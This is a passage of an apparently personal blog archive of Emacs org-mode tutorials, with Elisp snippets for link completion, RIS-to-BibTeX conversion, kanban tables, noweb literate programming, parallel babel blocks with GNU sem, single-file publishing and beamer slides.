      (replace-regexp-in-string "\\([a-z]\\)\\([A-Z]\\)" "\\1 \\2" s)))
   "[^A-Za-z0-9]+"))
(defun underscore-string (s) (mapconcat 'downcase   (split-name s) "_"))

Quite handy - and elegantly executed. Now I just need to make this available for interactive use. For this, Emacs Lisp offers many useful ways to turn Editor information into program information, called interactive codes - in my case the region-code: "r". This gives the function the beginning and the end of the currently selected region as arguments.

With this, I created an interactive function which de-camelcases and underscores the selected region:

(defun underscore-region (begin end) (interactive "r")
  (let* ((word (buffer-substring begin end))
         (underscored (underscore-string word)))
    (save-excursion
      (widen) ; break out of the subregion so we can fix every usage of the function
      (replace-string word underscored nil (point-min) (point-max)))))

And now we’re almost there. Just create a macro which searches for a function, selects its name, de-camelcaeses and underscores it and then replaces every usage of the CamelCase name by the underscored name. This isn’t perfect refactoring (can lead to errors), but it’s fast and I see every change it does.

C-x C-(
C-s def 
M-x mark-word
M-x underscore-region
C-x C-)

That’s it, now just call the macro repeatedly.

C-x eeeeee…

Now check the diff to fix where this 13 lines hack got something wrong ( like changing __init__ into _init_ - I won’t debug this, you’ve been warned ☺).

Happy Hacking!

AnhangGröße
2015-01-14-Mi-camel-case-to-underscore.org2.39 KB

Custom link completion for org-mode in 25 lines (emacs)

Update (2013-01-23): The new org-mode removed (org-make-link), so I replaced it with (concat) and uploaded a new example-file: org-custom-link-completion.el.
Happy Hacking!

1 Intro

I recently set up custom completion for two of my custom link types in Emacs org-mode. When I wrote on identi.ca about that, Greg Tucker-Kellog said that he’d like to see that. So I decided, I’d publish my code.

The link types I regularly need are papers (PDFs of research papers I take notes about) and bib (the bibtex entries for the papers). The following are my custom link definitions :

(setq org-link-abbrev-alist
      '(("bib" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/ref.bib::%s")
       ("notes" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/papers.org::#%s")
       ("papers" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/papers/%s.pdf")))

For some weeks I had copied the info into the links by hand. Thus an entry about a paper looks like the following.

* Title [[bib:identifier]] [[papers:name_without_suffix]]

This already suffices to be able to click the links for opening the PDF or showing the bibtex entry. Entering the links was quite inconvenient, though.

2 Implementation: papers

The trick to completion in org-mode is to create the function org-LINKTYPE-complete-link.

Let’s begin with the papers-links, because their completion is more basic than the completion of the bib-link.

First I created a helper function to replace all occurrences of a substring in a string1.

(defun string-replace (this withthat in)
  "replace THIS with WITHTHAT' in the string IN"
  (with-temp-buffer
    (insert in)
    (goto-char (point-min))
    (replace-string this withthat)
    (buffer-substring (point-min) (point-max))))

As you can see, it’s quite simple: Just create a temporary buffer and and use the default replace-string function I’m using daily while editing. Don’t assume I had figured out that elegant way myself. I just searched for it in the net and adapted the nicest code I found :)

Now we get to the real completion:

<<string-replace>>
(defun org-papers-complete-link (&optional arg)
  "Create a papers link using completion."
  (let (file link)
       (setq file (read-file-name "papers: " "papers/"))
       <<cleanup-link>>
    link))

The real magic is in read-file-name. That just uses the file-completion with a custom command prefix.

cleanup-link is only a small list of setq’s which removes parts of the filepath to make it compatible with the syntax for paper-links:

(let ((pwd (file-name-as-directory (expand-file-name ".")))
  (pwd1 (file-name-as-directory (abbreviate-file-name
                 (expand-file-name ".")))))
  (setq file (string-replace "papers/" "" file))
  (setq file (string-replace pwd "" (string-replace pwd1 "" file)))
  (setq file (string-replace ".pdf" "" file))
  (setq link (concat "papers:" file)))

And that’s it. A few lines of simple elisp and I have working completion for a custom link-type which points to research papers - and can easily be adapted when I change the location of the papers.

Now don’t think I would have come up with all that elegant code myself. My favorite language is Python and I don’t think that I should have to know emacs lisp as well as Python. So I copied and adapted most of it from existing functions in emacs. Just use C-h C-f <function-name> and then follow the link to the code :)

Remember: This is free software. Reuse and learning from existing code is not just allowed but encouraged.

3 Implementation: bib

For the bib-links, I chose an even easier way. I just reused reftex-do-citation from reftex-mode:

<<reftex-setup>>
(defun org-bib-complete-link (&optional arg)
  "Create a bibtex link using reftex autocompletion."
  (concat "bib:" (reftex-do-citation nil t nil)))

For reftex-do-citation to allow using the bib-style link, I needed some setup, but I already had that in place for explicit citation inserting (not generalized as link-type), so I don’t count following as part of the actual implementation. Also I likely copied most of it from emacs-wiki :)

(defun org-mode-reftex-setup ()
  (interactive)
  (and (buffer-file-name) (file-exists-p (buffer-file-name))
       (progn
        ; Reftex should use the org file as master file. See C-h v TeX-master for infos.
        (setq TeX-master t)
        (turn-on-reftex)
        ; don’t ask for the tex master on every start.
        (reftex-parse-all)
        ;add a custom reftex cite format to insert links
        (reftex-set-cite-format
         '((?b . "[[bib:%l][%l-bib]]")
           (?n . "[[notes:%l][%l-notes]]")
           (?p . "[[papers:%l][%l-paper]]")
           (?t . "%t")
           (?h . "** %t\n:PROPERTIES:\n:Custom_ID: %l\n:END:\n[[papers:%l][%l-paper]]")))))
  (define-key org-mode-map (kbd "C-c )") 'reftex-citation)
  (define-key org-mode-map (kbd "C-c (") 'org-mode-reftex-search))

(add-hook 'org-mode-hook 'org-mode-reftex-setup)

And that’s it. My custom link types now support useful completion.

4 Result

For papers, I get an interactive file-prompt to just select the file. It directly starts in the papers folder, so I can simply enter a few letters which appear in the paper filename and hit enter (thanks to ido-mode).

For bibtex entries, a reftex-window opens in a lower split-screen and asks me for some letters which appear somewhere in the bibtex entry. It then shows all fitting entries in brief but nice format and lets me select the entry to enter. I simply move with the arrow-keys, C-n/C-p, n/p or even C-s/C-r for searching, till the correct entry is highlighted. Then I hit enter to insert it.

./2012-06-15-emacs-link-completion-bib.png

And that’s it. I hope you liked my short excursion into the world of extending emacs to stay focussed while connecting seperate data sets.

I never saw a level of (possible) integration and consistency anywhere else which even came close to the possibilities of emacs.

And by the way: This article was also written in org-mode, using its literate programming features for code-samples which can actually be executed and extracted at will.

To put it all together I just need the following:

<<org-papers-complete-link>>
<<org-bib-complete-link>>

Now I use M-x org-babel-tangle to write the code to the file org-custom-link-completion.el. I attached that file for easier reference: org-custom-link-completion.el :)

Have fun with Emacs!

PS: Should something be missing here, feel free to get it from my public .emacs.d. I only extracted what seemed important, but I did not check if it runs in a pristine Emacs. My at-home branch is “fluss”.

Footnotes:

1 : Creating a custom function for string replace might not have been necessary, because some function might already exist for that. But writing it myself was faster than searching for it.

AnhangGröße
2012-06-15-emacs-link-completion-bib.png77.24 KB
2012-06-15-Fr-org-link-completion.org7.29 KB
org-custom-link-completion.el2.13 KB

Easily converting ris-citations to bibtex with emacs and bibutils

The problem

Nature only gives me ris-formatted citations, but I use bibtex.

Also ris is far from human readable.

The background

ris can be reformatted to bibtext, but doing that manually disturbs my workflow when getting references while taking note about a paper in emacs.

I tend to search online for references, often just using google scholar, so when I find a ris reference, the first data I get for the ris-citation is a link.

The solution

Making it possible

bibutils1 can convert ris to an intermediate xml format and then convert that to bibtex.

wget -O reference.ris RIS_URL
cat reference.ris | ris2xml | xml2bib >> ref.bib

This solves the problem, but it is not convenient, because I have to switch to the terminal, download the file, convert it and append the result to my bibtex file.

Making it convenient

With the first step, getting the ris-citation is quite inconvenient. I need 3 steps just for getting a citation.

But those steps are always the same, and since I use Emacs, I can automate and integrate them very easily. So I created a simple function in emacs, which takes the url of a ris citation, converts it to bibtex and appends the result to my local bibtex file. Now I get a ris citation with a simple call to

M-x ris-citation-to-bib

Then I enter the url and the function appends the citation to my bibtex file.2

Feel free to integrate it into your own emacs setup (additionally to the GPLv3 you can use any license used by emacswiki or worg).

(defun ris-citation-to-bib (&optional ris-url) 
  "get a ris citation as bibtex in one step. Just call M-x
ris-citation-to-bib and enter the ris url. 
Requires bibutils: http://sourceforge.net/p/bibutils/home/Bibutils/ 
"
  (interactive "Mris-url: ")
  (save-excursion
    (let ((bib-file "/home/arne/aufschriebe/ref.bib")
          (bib-buffer (get-buffer "ref.bib"))
          (ris-buffer (url-retrieve-synchronously ris-url)))
      ; firstoff check if we have the bib buffer. If yes, move point to the last line.
      (if (not (member bib-buffer (buffer-list)))
          (setq bib-buffer (find-file-noselect bib-file)))
      (progn 
        (set-buffer bib-buffer)
        (goto-char (point-max)))
      (if ris-buffer
          (set-buffer ris-buffer))
      (shell-command-on-region (point-min) (point-max) "ris2xml | xml2bib" ris-buffer)
      (let ((pmin (- (search-forward "@") 1))
            (pmax (search-forward "}

"
))) (if (member bib-buffer (buffer-list)) (progn (append-to-buffer bib-buffer pmin pmax) (kill-buffer ris-buffer) (set-buffer bib-buffer) (save-buffer) ))))))

Happy Hacking!

PS: When I don’t have the URL (many thanks to journals giving me only a download button), I open the file, select the content and hit M-| (shell-command-on-region) with ris2xml | xml2bib (searching backwards via C-r ris so I to avoid typing the exact command) and get the bibtex version in the results buffer.


  1. To get bibutils in Gentoo, just call emerge app-text/bibutils

  2. Well, actually I only use M-x ris- TAB, but that’s a detail (though I would not want to work without it :) ) 

El Kanban Org: parse org-mode todo-states to use org-tables as Kanban tables

Kanban for emacs org-mode.

Update (2020): Kanban moved to sourcehut: https://hg.sr.ht/~arnebab/kanban.el

Update (2013-04-13): Kanban.el now lives in its own repository: on bitbucket and on a statically served http-repo (to be independent from unfree software).

Update (2013-04-10): Thanks to Han Duply, kanban links now work for entries from other files. And I uploaded kanban.el on marmalade.

Some time ago I learned about kanban, and the obvious next step was: “I want to have a kanban board from org-mode”. I searched for it, but did not find any. Not wanting to give up on the idea, I implemented my own :)

The result are two functions: kanban-todo and kanban-zero.

“Screenshot” :)

TODODOINGDONE
Refactor in such a way that the
let Presentation manage dumb sprites
return all actions on every command:
Make the UiState adhere the list of
Turn the model into a pure state

kanban-todo

kanban-todo provides your TODO items as kanban-fields. You can move them in the table without having duplicates, so all the state maintenance is done in the kanban table. Once you are finished, you mark them as done and delete them from the table.

To set it up, put kanban.el somewhere in your load path and (require 'kanban) (more recent but potentially unstable version). Then just add a table like the following:

|   |   |   |
|---+---+---|
|   |   |   |
|   |   |   |
|   |   |   |
|   |   |   |
#+TBLFM: $1='(kanban-todo @# @2$2..@>$>)::@1='(kanban-headers $#)

Click C-c C-c with the point on the TBLFMT line to update the table.

The important line is the #+TBLFM. That says “use my TODO items in the TODO column, except if they are in another column” and “add kanban headers for my TODO states”

The kanban-todo function takes an optional parameter match, which you can use to restrict the kanban table to given tags. The syntax is the same as for org-mode matchers. The third argument allows you to provide a scope, for example a list of files.

To only set the scope, use nil for the matcher.

See C-h f org-map-entries and C-h v org-agenda-files for details.

kanban-zero

kanban-zero is a zero-state Kanban: All state is managed in org-mode and the table only displays the kanban items.

To set it up, put kanban.el somwhere in your load path and (require 'kanban). Then just add a table like the following:

|   |   |   |
|---+---+---|
|   |   |   |
|   |   |   |
|   |   |   |
|   |   |   |
#+TBLFM: @2$1..@>$>='(kanban-zero @# $#)::@1='(kanban-headers $#)

The important line is the #+TBLFM. That says “show my org items in the appropriate column” and “add kanban headers for my TODO states”.

Click C-c C-c with the point on the TBLFMT line to update the table.

The kanban-zero function takes an optional parameter match, which you can use to restrict the kanban table to given tags. The syntax is the same as for org-mode matchers. The third argument allows you to provide a scope, for example a list of files.

To only set the scope, use nil for the matcher.

An example for matcher and scope would be:

#+TBLFM: @2$1..@>$>='(kanban-zero @# $# "1w6" '("/home/arne/.emacs.d/private/org/emacs-plan.org"))::@1='(kanban-headers $#)

See C-h f org-map-entries and C-h v org-agenda-files for details.

Contribute

To contribute to kanban.el, just change the file and write a comment about your changes. Maybe I’ll setup a repo on Bitbucket at some point…

Example

In the Hexbattle game-draft, I use kanban to track my progress:

Table of Contents

1 Kanban

STARTED
Refactor in such a way that the
let Presentation manage dumb sprites
return all actions on every command:
Make the UiState adhere the list of
Turn the model into a pure state

2 refactor Hexbattle    1w6

… and so on …

Advanced usage

“Graphical” TODO states

To make the todo states easier to grok directly you can use unicode symbols for them. Example:

#+SEQ_TODO: ❢ ☯ ⧖ | ☺ ✔ DEFERRED ✘
| ❢ | ☯ | ⧖ | ☺ | |---+---+---+---| | | | | | #+TBLFM: @1='(kanban-headers $#)::@2$1..@>$>='(kanban-zero @# $#)

In my setup they are ❢ (todo) ☯ (doing) ⧖ (waiting) and ☺ (to report). Not shown in the kanban Table are ✔ (finished), ✘ (dropped) and deferred (later), because they don’t require any action from me, so I don’t need to see them all the time.

Collecting kanban entries via SSH

If you want to create a shared kanban table, you can use the excellent transparent network access options from Emacs tramp to collect kanban entries directly via SSH.

To use that, simply pass an explicit list of files to kanban-zero as 4th argument (if you don’t use tag matching just use nil as 3rd argument). "/ssh:host:path/to/file.org" retrieves the file ~/path/to/file.org from the host.

| ❢ | ☯ |
|---+---|
|   |   |
#+TBLFM: @1='(kanban-headers $#)::@2$1..@>$>='(kanban-zero @# $# nil (list (buffer-file-name) "/ssh:localhost:plan.org"))

Caveeat: all included kanban files have to use at least some of the same todo states: kanban.el only retrieves TODO states which are used in the current buffer.

AnhangGröße
kanban.el5.86 KB

How to show the abstract before the table of contents in org-mode

I use Emacs Org-Mode for writing all kinds of articles. The standard format for org-mode is to show the table of contents before all other content, but that requires people to scroll down to see whether the article is interesting for them. Therefore I want the abstract to be shown before the table of contents.

1 Intro

There is an old guide for showing the abstract before the TOC in org-mode<8, but since I use org-mode 8, that wasn’t applicable to me.

With a short C-h v org-toc TAB TAB (means: search all variables which start with org- and containt -toc) I found the following even simpler way. After I got that solution working, I found that this was still much too complex and that org-mode actually provides an even easier and very convenient way to add the TOC at any place.

2 Solution

(from the manual)

At the beginning of your file (after the title) add

#+OPTIONS: toc:nil

Then after the abstract add a TOC:

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+TOC: headlines 2

Done. Have fun with org-mode!

3 Appendix: Complex way

This is the complicated way I tried first. It only works with LaTeX, but there it works. Better use the simple way.

Set org-export-with-toc to nil as file-local variable. This means you just append the following to the file:

# Local Variables:
# org-export-with-toc: nil
# End:

(another nice local variable is org-confirm-babel-evaluate: nil, but don’t set that globally, otherwise you could run untrusted code when you export org-mode files from others. When this is set file-local, emacs will ask you for each file you open whether you want to accept the variable setting)

Then write the abstract before the first heading and add tableofcontents after it. Example:

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+LATEX: \tableofcontents
AnhangGröße
2013-11-21-Do-emacs-orgmode-abstract-before-toc.pdf143.29 KB
2013-11-21-Do-emacs-orgmode-abstract-before-toc.org2.23 KB

IRC-chat via Tor with Emacs on Gentoo

As example: Connecting to #youbroketheinternet.

emerge privoxy torsocks net-vpn/tor
# rc-config start privoxy tor
# rc-update add privoxy default
# rc-update add tor default
mkdir -p ~/.local/EMACS_TOR_HOME/.emacs.d
echo "(require 'socks)" >> ~/.local/EMACS_TOR_HOME/.emacs.d/init.el
HOME=~/.local/EMACS_TOR_HOME torify emacs --title "Emacs-torified"
# M-x customize-variable RET socks-server RET
#   host: localhost
#   port: 9050
#   type: Socks v5
#   (C-x C-s to save and set)
# M-x erc-select
#   server loupsycedyglgamf.onion
#   port 67
# the welcome channel is good to go.

See https://www.emacswiki.org/emacs/ErcProxy#toc2

and http://youbroketheinternet.org/#overlay

Insert a scaled screenshot in emacs org-mode

@marjoleink asked on identi.ca1, if it is possible to use emacs org-mode for showing scaled screenshots inline while writing. Since I thought I’d enjoy some hacking, I decided to take the challenge.

It does not do auto-scaling of embedded images, as far as I know, but the use case of screenshots can be done with a simple function (add this to your ~/.emacs or ~/.emacs.d/init.el):

(defun org-insert-scaled-screenshot ()
  "Insert a scaled screenshot 
for inline display 
into your org-mode buffer."
  (interactive)
  (let ((filename 
         (concat "screenshot-" 
                 (substring 
                  (shell-command-to-string 
                   "date +%Y%m%d%H%M%S")
                  0 -1 )
                 ".png")))
    (let ((scaledname 
           (concat filename "-width300.png")))
(shell-command (concat "import -window root " filename)) (shell-command (concat "convert -adaptive-resize 300 " filename " " scaledname)) (insert (concat "[[./" scaledname "]]")))))

Now just call M-x org-redisplay-inline-images to see the screenshot (or add it to the function).

In action:

scaled screenshot

Have fun with Emacs - and happy hacking!

PS: In case it’s not obvious: The screenshot shows emacs just as the screenshot is being shot - with the method shown here ☺)


  1. Matthew Gregg: @marjoleink "way of life" thing again, but if you can invest some time, org-mode is a really powerful note keeping environment. → Marjolein Katsma: @mcg I'm sure it is - but seriously: can you embed a diagram2 or screenshot, scale it, and link it to itself? 

  2. For diagrams, you can just insert a link to the image file without description, then org-mode can show it inline. To get an even nicer user-experience (plain text diagrams or ascii-art), you can use inline code via org-babel using graphviz (dot) or ditaa - the latter is used for the diagrams in my complete Mercurial branching strategy

AnhangGröße
screenshot-20121122101933-width300.png108.08 KB
screenshot-20121122101933-width600.png272.2 KB

Minimal example for literate programming with noweb in emacs org-mode

If you want to use the literate programming features in emacs org-mode, you can try this minimal example to get started: Activate org-babel-tangle, then put this into the file noweb-test.org:

Minimal example for noweb in org-mode

* Assign 

First we assign abc:

#+begin_src python :noweb-ref assign_abc
abc = "abc"
#+end_src

* Use

Then we use it in a function:

#+begin_src python :noweb tangle :tangle noweb-test.py
def x():
  <<assign_abc>>
  return abc

print(x())
#+end_src

noweb-test.org

Hit C-c C-c to evaluate the source block. Hit C-c C-v C-t to put the expanded code into the file noweb-test.py.

The exported code looks like this:

def x():
  abc = "abc"
  return abc
print(x())

noweb-test.py

(html generated with org-export-as-html-to-buffer and slightly reniced to escape the additional parsing I have on my site)

And with org-export-as-pdf we get this:

org-mode-noweb-example

noweb-test.pdf

Add :results output to the #+begin_src line of the second block to see the print results under that block when you hit C-c C-c in the block.

You can also use properties of headlines for giving the noweb-ref. Org-mode can then even concatenate several source blocks into one noweb reference. Just hit C-c C-x p to set a property (or use M-x org-set-property), then set noweb-ref to the name you want to use to embed all blocks under this heading together.

Note: org-babel prefixes each line of an included code-block with the prefix used for the reference (here <<assign_abc>>). This way you can easily include blocks inside python functions.

Note: To keep noweb-references literally in the output or similar, have a look at the different options to :noweb.

Note: To do this with shell-code, it’s useful to change the noweb markers to {{{ and }}}, because << and >> are valid shell-syntax, so they disturb the highlighting in sh-mode. Also confirming the evaluation every time makes plain exporting problematic. To fix this, just add the following somewhere in the file (to keep this simple, just add it to the end):

# Local Variables:
# org-babel-noweb-wrap-start: "{{{"
# org-babel-noweb-wrap-end: "}}}"
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:

Have fun with Emacs and org-mode!

AnhangGröße
noweb-test.pdf81.69 KB
noweb-test.org290 Bytes
noweb-test.py.txt49 Bytes
noweb-test-pdf.png6.05 KB

Org-mode with Parallel Babel

Update 2017: a block with sem -j ... seems to block in recent versions of Emacs until all subtasks are done. It would be great if someone could figure out why (though it likely is the right thing to do). To circumvent that, you can daemonize the job in sem, but that might have unwanted side-effects: sem "[job] &"

Babel in Org

Emacs Org-mode provides the wonderful babel-capability: Including code-blocks in any language directly in org-mode documents in plain text.

In default usage, running such code freezes my emacs until the code is finished, though.

Up to a few weeks ago, I solved this with a custom function, which spawns a new emacs as script runner for the specific code:

; Execute babel source blocks asynchronously by just opening a new emacs.
(defun bab/org-babel-execute-src-block-new-emacs ()
  "Execute the current source block in a separate emacs,
so we do not block the current emacs."
  (interactive)
  (let ((line (line-number-at-pos))
        (file (buffer-file-name)))
    (async-shell-command (concat 
                          "TERM=vt200 emacs -nw --find-file " 
                          file 
                          " --eval '(goto-line "
                          (number-to-string line) 
                          ")' --eval "
     "'(let ((org-confirm-babel-evaluate nil))(org-babel-execute-src-block t))' "
                          "--eval '(kill-emacs 0)'"))))

and its companion for exporting to beamer-latex presentation pdf:

; Export as pdf asynchronously by just opening a new emacs.
(defun bab/org-beamer-export-new-emacs ()
  "Export the current file in a separate emacs,
so we do not block the current emacs."
  (interactive)
  (let ((line (line-number-at-pos))
        (file (buffer-file-name)))
    (async-shell-command (concat 
                          "TERM=vt200 emacs -nw --find-file " 
                          file 
                          " --eval '(goto-line " 
                          (number-to-string line) 
                          ")' --eval "
     "'(let ((org-confirm-babel-evaluate nil))(org-beamer-export-to-pdf))' "
                          "--eval '(kill-emacs 0)'"))))

But for shell-scripts there’s a much simpler alternative:

GNU Parallel to the rescue! Process-pool made easy.

Instead of spawning an external process, I can just use GNU Parallel for the long-running program-calls in the shell-code. For example like this (real code-block):

#+BEGIN_SRC sh :exports none
  oldPWD=$(pwd)
  cd ~/tm5tools/plotting
  filename="./obsheat-increasing.png" >/dev/null 2>/dev/null
  sem -j -1 ./plotstation.py -c ~/sun-work/ct-production-out-5x7e300m1.0 -C "aircraft" -c ~/sun-work/ct-production-out-5x7e300m1.0no-aircraft -C "continuous"  --obsheat --station allnoaa --title "\"Reducing observation coverage\"" -o ${oldPWD}/${filename}
  cd -
#+END_SRC

Let me explain this.

sem is a part of GNU parallel which makes parallel execution easy. Essentially it gives us a simple version of the convenience we know from make.

for i in {1..100}; do 
    sem -j -1 [code] # run N-1 processes with N as the number of
                     # pocessors in my computer
done

This means that the above org-mode block will finish instantly, but there will be a second process managed by GNU parallel which executes the plotting script.

The big advantage here is that I can also set this to execute on exporting a document which might run hundreds of code-blocks. If I did this with naive multiprocessing, that would spawn 100 processes which overwhelm the memory of my system (yes, I did that…).

sem -j -1 ensures, that this does not happen. Essentially it provides a process-pool with which it executes the code.

If you use this on export, take care to add a final code-block which waits until all other blocks finished:

sem --wait

A word of caution: Shell escapes

If you use GNU parallel to run programs, the arguments are interpreted two times: once when you pass them to sem and a second time when sem passes them on. Due to this, you have to add escaped quote-marks for every string which contains whitespace. This can look like the following code (the example above reduced to its essential parts):

sem -j -1 ./plotstation.py --title "\"Reducing observation coverage\""

I stumbled over this a few times, but the convenience of GNU parallel is worth the small extra-caution.

Besides: For easier editing of inline-source-code, set org-src-fontify-natively to true (t), either via M-x customize-variable or by adding the following to your .emacs:

(setq org-src-fontify-natively t)

Summary

With the tool sem from GNU parallel you get parallel execution of shell code-blocks in emacs org-mode using the familiar syntax from make:

sem -j -1 [escaped code]

Publish a single file with emacs org-mode

I often write small articles on some experience I make, and since I want to move towards using static pages more often, I tried using emacs org-mode publishing for that. Strangely the simple usecase of publishing a single file seems quite a bit more complex than needed, so I document the steps here.

This is my first use of org-publish, so I likely do not use it perfectly. But as it stands, it works. You can find the org-publish version of this article at draketo.de/proj/orgmode-single-file.

1 Why static pages?

I recently lost a dynamic page to hackers. I could not recover the content from all the spam which flooded it. It was called good news and I had wanted to gather positive news which encourage getting active - but I never really found the time to get it running. See what is left of it: http://gute-neuigkeiten.de

Any dynamic page carries a big maintenance cost, because I have to update all the time to keep it safe from spammers who want to abuse it for commercial spam - in the least horrible case. I can choose a managed solution, but that makes me dependant on the hoster providing what I need. Or I can take the sledgehammer and just use a static site: It never does any writes to the webserver, so there is nothing to hack.

As you can see, that’s what I’m doing nowadays.

2 Why Emacs Org-Mode?

Because after having used MacOS for almost a decade and then various visual-oriented programs for another five years, Emacs is nowadays the program which is most convenient to me. It achieves a level of integration and usability which is still science-fiction in other systems - at least when you’re mostly working with text.

And Org-mode is to Emacs as Emacs is to the Operating System: It begins as a simple todo-list and accompanies you all the way towards programming, reproducible research - and publishing websites.

3 Current Solution

Currently I first publish the single file to FTP and then rename it to index.html. This translates to the following publish settings:

(setq private-publish-ftp-proj (concat "/ftp:" USER "@" HOST ":arnebab/proj/"))

(setq org-publish-project-alist
      '(("orgmode-single-file"
         :base-directory "~/.emacs.d/private/journal"
         :publishing-directory (concat private-publish-ftp-proj "orgmode-single-file/")
         :base-extension "org"
         :publishing-function org-html-publish-to-html
         :completion-function (lambda () (rename-file 
                                          (concat private-publish-ftp-proj 
                                                  "orgmode-single-file/2013-11-25-Mo-publish-single-file-org-mode.html") 
                                          (concat private-publish-ftp-proj 
                                                  "orgmode-single-file/index.html") t))
         :section-numbers nil
         :with-toc t
         :html-preamble t
         :exclude ".*"
         :include ["2013-11-25-Mo-publish-single-file-org-mode.org"])))

Now I can use C-c C-e P x orgmode-single-file to publish this file to the webserver whenever I change it.

Note the lambda: I just copy the published to index.html, because I did not find out, how to rename the file by just setting an option. :index-filename did not work. But likely I missed something which would make this much nicer.

Note that if I had wanted to publish a folder full of files, this would have been much easier: There actually is an option to create an automatic index-file and sitemap.

For more details, read the org-mode publishing guide.

4 Conclusion

This is not as simple as I would like it to be. Maybe (or rather: likely) there is a simpler way. But I can now publish arbitrary org-mode files to my webserver without much effort (and without having to switch context so some other program). And that’s something I’ve been missing for a long time, so I’m very happy to finally have it.

And it was less pain that I feared, though publishing this via my drupal-site, too, obviously shows that I’m still far from moving to static pages for everything. For work-in-progress, this is great, though - for example for my Basics for Guile Scheme.

Read your python module documentation from emacs

Update 2021: Fixed links that died with Bitbuckets hosting.

I just found the excellent pydoc-info mode for emacs from Jon Waltman. It allows me to hit C-h S in a python file and enter a module name to see the documentation right away. If the point is on a symbol (=module or class or function), I can just hit enter to see its docs.

pydoc in action

In its default configuration (see the Readme) it “only” reads the python documentation. This alone is really cool when writing new python code, but it s not enough, since I often use third party modules.

And now comes the treat: If those modules use sphinx for documentation (≥1.1), I can integrate them just like the standard python documentation!

It took me some time to get it right, but now I have all the documentation for the inverse modelling framework I contribute to directly at my fingertips: Just hit C-h S ENTER when I’m on some symbol and a window shows me the docs:

custom pydoc in action
The text in this image is from Wouter Peters. Used here as short citation which should be legal almost everywhere under citation rules.

I want to save you the work of figuring out how to do that yourself, so here’s a short guide for integrating the documentation for your python program into emacs.

Integrating your own documentation into emacs

The prerequisite for integrating your own documentation is to use sphinx for documenting your code. See their tutorial for info how to set it up. As soon as sphinx works for you, follow this guide to integrate your docs in your emacs.

Install pydoc-info

First get pydoc-info and the python infofile (adapt this to your local setup):

# get the mode
cd ~/.emacs.d/libs
hg clone https://hg.sr.ht/~arnebab/pydoc-info
# and the pregenerated info-file for python
wget http://www.draketo.de/dateien/python.info.gz
gunzip python.info.gz
sudo cp python.info /usr/share/info
sudo install-info --info-dir=/usr/share/info python.info

To build the info file for python yourself, have a look at the Readme.

Turn your documentation into info

Now turn your own documentation into an info document and install it.

Sphinx uses a core configuration file named conf.py. Add the following to that file, replacing all values but index and False by the appropriate names for you project:

# One entry per manual page. 
# list of tuples (startdocname, 
# targetname, title, author, dir_entry, 
# description, category, toctree_only).
texinfo_documents = [
  ('index', # startdocname, keep this!
   'TARGETNAME', # targetname
   u'Long Title', # title
   u'Author Name', # author
   'Name in the Directory Index of Info', # dir_entry
   u'Long Description', # description
   'Software Development', # cathegory
   False), # better keep this, too, i think.
]

Then call sphinx and install the info files like this (maybe adapted to your local setup):

sphinx-build -b texinfo source/ texinfo/ 
cd texinfo
sudo install-info --info-dir=/usr/share/info TARGETNAME.info
sudo cp TARGETNAME.info /usr/share/info/

Activate pydoc-info, including your documentation

Finally add the following to your .emacs (or wherever you store your personal adaptions):

; Show python-documentation as info-pages via C-h S
(setq load-path (cons "~/.emacs.d/libs/pydoc-info" load-path))
(require 'pydoc-info)
(info-lookup-add-help
   :mode 'python-mode
   :parse-rule 'pydoc-info-python-symbol-at-point
   :doc-spec
   '(("(python)Index" pydoc-info-lookup-transform-entry)
     ("(TARGETNAME)Index" pydoc-info-lookup-transform-entry)))
AnhangGröße
emacs-pydoc.png52 KB
emacs-pydoc-standardlibrary.png34.22 KB

Recipes for presentations with beamer latex using emacs org-mode

I wrote some recipes for creating the kinds of slides I need with emacs org-mode export to beamer latex.

Update: Read ox-beamer to see how to adapt this to work with the new export engine in org-mode 0.8.

PDF recipes The recipes as PDF (21 slides, 247 KiB)

org-mode file The org-mode sources (12.2 KiB)

Below is an html export of the org-mode file. Naturally it does not look as impressive as the real slides, but it captures all the sources, so I think it has some value.

Note: To be able to use the simple block-creation commands, you need to add #+startup: beamer to the header of your file or explicitely activate org-beamer with M-x org-beamer-mode.

«I love your presentation»:

PS: I hereby allow use of these slides under any of the licenses used by worg and/or the emacs wiki.

1 Introduction

1.1 Usage

1.1.1 (configure your emacs, see Basic Configuration at the end)

1.1.2 C-f <file which ends in .org>

1.1.3 Insert heading:

Hello World

#+LaTeX_CLASS: beamer
#+BEAMER_FRAME_LEVEL: 2

* Hello
** Hello GNU
Nice to see you!

1.1.4 M-x org-export-as-pdf

done: Your first org-beamer presentation.

1.2 org-mode + beamer = love

1.2.1 Code    BMCOL

Recipes
#+LaTeX_CLASS: beamer
#+BEAMER_FRAME_LEVEL: 2
* Introduction
** org-mode + beamer =  love
*** Code :BMCOL:
    :PROPERTIES:
    :BEAMER_col: 0.7
    :END:
<example block>
*** Simple block  :BMCOL:B_block:
    :PROPERTIES:
    :BEAMER_col: 0.3
    :BEAMER_env: block
    :END:
it's that easy!

1.2.2 Simple block    BMCOL B_block

it's that easy!

1.3 Two columns - in commands

1.3.1 Commands    BMCOL B_block

** Two columns - in commands
*** Commands
C-c C-b | 0.7
C-c C-b b
C-n
<eTAB (write example) C-n C-n
*** Result
C-c C-b | 0.3
C-c C-b b
even easier - and faster!

1.3.2 Result    BMCOL B_block

even easier - and faster!

2 Recipes

2.1 Four blocks - code

*** Column 1 :B_ignoreheading:BMCOL:
    :PROPERTIES:
    :BEAMER_env: ignoreheading
    :BEAMER_col: 0.5
    :END:

*** One
*** Three                                                           

*** Column 2 :BMCOL:B_ignoreheading:
    :PROPERTIES:
    :BEAMER_col: 0.5
    :BEAMER_env: ignoreheading
    :END:

*** Two
*** Four

2.2 Four blocks - result

2.2.1 Column 1    B_ignoreheading BMCOL

2.2.2 One

2.2.3 Three

2.2.4 Column 2    BMCOL B_ignoreheading

2.2.5 Two

2.2.6 Four

2.3 Four nice blocks - commands

*** 
C-c C-b | 0.5 # column
C-c C-b i # ignore heading
*** One 
C-c C-b b # block
*** Three 
C-c C-b b
*** 
C-c C-b | 0.5
C-c C-b i
*** Two 
C-c C-b b
*** Four 
C-c C-b b

2.4 Four nice blocks - result

2.4.1    BMCOL B_ignoreheading

2.4.2 One    B_block

